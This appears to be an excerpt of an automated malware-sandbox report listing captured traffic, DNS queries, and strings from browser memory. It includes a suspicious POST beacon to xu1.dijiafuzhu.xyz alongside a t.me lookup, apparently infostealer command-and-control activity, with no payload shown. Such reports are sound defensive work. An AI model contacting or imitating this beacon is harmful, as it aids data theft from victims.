Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1739793807751&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f165c55fffe4d7faca988d1b9761219&activityId=7f165c55fffe4d7faca988d1b9761219&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=82C6D2ADECBB405280746ABA18E60063&MUID=247581D5D86769782C0D9443D9ED68BE HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=247581D5D86769782C0D9443D9ED68BE; _EDGE_S=F=1&SID=32366AC5492F65B21A5F7F5348E86499; _EDGE_V=1; SM=T

Source: 0adad5b1-40aa-46d8-b337-6a814dd618d9.tmp.14.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log2.14.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log2.14.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log2.14.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2655382001.000012B000674000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: /www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2658049917.000012B000C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655382001.000012B000674000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000003.2572096912.000012B000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2572296613.000012B00041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2572015397.000012B000F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000005.00000003.2572096912.000012B000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2572296613.000012B00041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2572015397.000012B000F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000005.00000002.2655382001.000012B000674000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ht/www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2655440089.000012B000694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660242790.000012B0010E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2660242790.000012B0010E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlP equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlultP equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: xu1.dijiafuzhu.xyz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----p8gdtrqimyusrimgdba1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0Host: xu1.dijiafuzhu.xyzContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 00000005.00000002.2656272363.000012B0007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000005.00000002.2654697420.000012B000498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205ata
Source: chrome.exe, 00000005.00000002.2656272363.000012B0007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000005.00000002.2656272363.000012B0007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000005.00000002.2654697420.000012B000498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000005.00000002.2654697420.000012B000498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000005.00000002.2656272363.000012B0007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000005.00000002.2654697420.000012B000498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2700507377.000018A000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000005.00000002.2654697420.000012B000498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000005.00000002.2657680992.000012B000AD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000005.00000002.2651137635.000012B00001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000005.00000002.2655467938.000012B0006A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2700507377.000018A000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2700507377.000018A000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
